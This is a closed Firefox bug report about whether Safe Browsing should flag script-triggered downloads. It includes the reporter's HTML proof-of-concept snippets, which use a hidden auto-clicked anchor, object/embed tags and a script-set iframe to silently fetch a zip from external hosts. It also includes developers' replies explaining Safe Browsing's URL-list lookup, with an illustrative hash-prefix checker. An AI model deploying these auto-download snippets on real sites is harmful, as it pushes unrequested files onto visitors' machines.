Closed Bug 1813575 Opened 2 years ago Closed 2 years ago

Malware can download within js

Categories

(Toolkit :: Safe Browsing, defect)

RESOLVED INVALID

People

(Reporter: sm.tomal741, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

The JavaScript is embedded in the HTML page, and it runs when the page is loaded by the browser. The JavaScript code creates an a element, sets its properties, and adds it to the document.body. When the code triggers the click event on the a element, the browser starts the download process.

In this case, this should be restricted or blocked or show a warning in the malware landing page, which is missing in Firefox.

Reproduce Steps:

  1. POC CODE:
<html>
<head>
    <script>
        window.onload = function() {
            const aElement = document.createElement("a");
            aElement.setAttribute("href", "https://filebin.net/archive/1tgmv6mp174kau3n/zip");
            aElement.setAttribute("download", "file.zip");
            aElement.style.display = "none";
        
            document.body.appendChild(aElement);
        
            aElement.click();
        };
    </script>
</head>
<body>
    Example Page Example.
</body>
</html>
  2. URL: https://anacondabd.000webhostapp.com/file4
Flags: sec-bounty?

When visiting this site: https://testsafebrowsing.appspot.com/s/malware.html, the malware is triggered by the embedded src, and it gives a warning because of the advisory provided by Google Safe Browsing (according to the page). But a malware file can also be triggered by JS, which Firefox doesn't restrict or block. Also, a direct file download or executing something by JS in the browser is a security concern which Firefox should look into.

(I've edited the first comment to fix the markup.)

Thanks

You can also check this code for a malware landing site loaded as object or embed:

<html>
<head></head>
<body>
Example Page Example.
<p>
<object data="https://filebin.net/archive/1tgmv6mp174kau3n/zip"></object>
</p>
</body>
</html>

URL: https://anacondabd.000webhostapp.com/obj.html

Component: Security → Safe Browsing
Product: Firefox → Toolkit

(In reply to sm.tomal741 from comment #1)

> When visiting this site: https://testsafebrowsing.appspot.com/s/malware.html, the malware is triggered by the embedded src, and it gives a warning because of the advisory provided by Google Safe Browsing (according to the page). But a malware file can also be triggered by JS, which Firefox doesn't restrict or block.

We give the warning because that particular download is in the SafeBrowsing list. Browsers aren't anti-virus and we don't scan downloads; all we are doing is checking against known popular malware. It weeds out a lot of stuff to protect people in bulk, but it is no substitute for an anti-virus program to detect novel targeted attacks.

> Also, a direct file download or executing something by JS in the browser is a security concern which Firefox should look into.

There are bugs on file for that, but I get the same behavior on Chrome for https://anacondabd.000webhostapp.com/file4 so I believe this is expecting browsers to be what they are not.

Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Resolution: --- → INVALID
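
The reply above says the warning depends on the URL being on the Safe Browsing list, not on how the page starts the download. The sketch below is an added example, not Firefox's code or part of the original thread: a simplified Safe Browsing v4-style hash-prefix lookup, assuming already-canonicalized URLs and a constructed local list (`malware.example` is a placeholder entry).

```python
import hashlib
from urllib.parse import urlsplit

def lookup_expressions(url):
    """Host-suffix/path-prefix strings a Safe Browsing v4-style client hashes for one URL.
    Assumes the URL is already canonicalized and the host is not an IP literal."""
    parts = urlsplit(url)
    host, path = parts.hostname or "", parts.path or "/"
    # Exact host, then suffixes of the last five labels (never the bare TLD).
    hosts, tail = [host], host.split(".")[-5:]
    for i in range(len(tail) - 1):
        suffix = ".".join(tail[i:])
        if suffix not in hosts:
            hosts.append(suffix)
    # Exact path with query, exact path, then "/" plus up to three directory prefixes.
    paths = [path + "?" + parts.query] if parts.query else []
    candidates, prefix = [path, "/"], "/"
    for segment in [s for s in path.split("/")[:-1] if s][:3]:
        prefix += segment + "/"
        candidates.append(prefix)
    for candidate in candidates:
        if candidate not in paths:
            paths.append(candidate)
    return [h + p for h in hosts for p in paths]

def prefix_of(expression, length=4):
    return hashlib.sha256(expression.encode()).digest()[:length]

def on_blocklist(url, local_prefixes):
    """True if any expression's hash prefix is in the local list. A real client
    would confirm a prefix hit with a full-hash request; that step is omitted."""
    return any(prefix_of(e) in local_prefixes for e in lookup_expressions(url))

# Constructed local list: an entry standing in for the listing of the test URL
# quoted in the thread, plus a made-up host-wide entry (placeholder domain).
LOCAL_PREFIXES = {
    prefix_of("testsafebrowsing.appspot.com/s/malware.html"),
    prefix_of("malware.example/"),
}

# The lookup sees only the URL; whether it was reached through a scripted
# <a download> click, an <object>, or an <iframe> is not an input.
CHECKS = {url: on_blocklist(url, LOCAL_PREFIXES) for url in (
    "https://testsafebrowsing.appspot.com/s/malware.html",
    "https://filebin.net/archive/1tgmv6mp174kau3n/zip",
    "https://cdn.malware.example/a/b.zip",
)}

if __name__ == "__main__":
    for url, listed in CHECKS.items():
        print("BLOCK" if listed else "allow", url)
```

The filebin URL from the report passes because nothing in the list covers it, while the placeholder host-wide entry catches any path under that host.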

If you were trying to report an issue with safe browsing, you should use example URLs that are blocked by safe browsing. The filebin file downloaded just fine in Chrome for me. Firefox does not block pages that contain embedded things on the safe browsing list, but we don't load them. For instance, the embed image_large.html malware case from that Chromium bug report loads in Firefox, but we just don't show the image.

I tried the example <embed src="https://testsafebrowsing.appspot.com/s/malware.html"> in the Chrome bug. We do load the HTML page as intended, but we do not load the embedded malware page. I loaded the page in Safari, and clicked through the warning, and then the page has some text like "Malware Page Example", but that text (and the download link) does not appear in Firefox.

Take a look at this documentation: https://chromium.googlesource.com/chromium/src/+/acb933d418845fb73e5705ff499e414a021f160c/chrome/test/data/safe_browsing/malware4.html

This is the URL: http://anacondabd.000webhostapp.com/obj2
and the code:
<html>
<body>
<div foo=1>
<div bar=1>
<embed src="https://anacondabd.000webhostapp.com/obj.html">
</div>
</div>
</body>
</html>
Even it works in Chrome, I don't get any warning.

What's the difference now?

And yes, browsers aren't anti-virus, and I am not saying that; the problem I faced is in a malware landing page which auto-downloads, and I thought it should be an issue for Firefox, and that's why I reported it.

If you bother with filebin then take a look at this.

The given URL to target, or when the user goes to this URL: https://anacondabd.000webhostapp.com/obj4
for obj4 code:
<html>
<head></head>
<body>
Example Page Example.
<p>
<object data="https://anacondabd.000webhostapp.com/obj3"></object>
</p>
</body>
</html>

obj3 code:
<html>
<head></head>
<body>
<iframe id="myIframe" style="display:none"></iframe>
<script>
var iframe = document.getElementById("myIframe");
iframe.src = "https://anacondabd.000webhostapp.com/zipped.zip";
iframe.style.display = "block";
</script>
</body>
</html>

And it can easily download malware via a malware landing page, which should be restricted according to the documentation.

That is what I am saying must be triggered by browsers.

Flags: sec-bounty? → sec-bounty-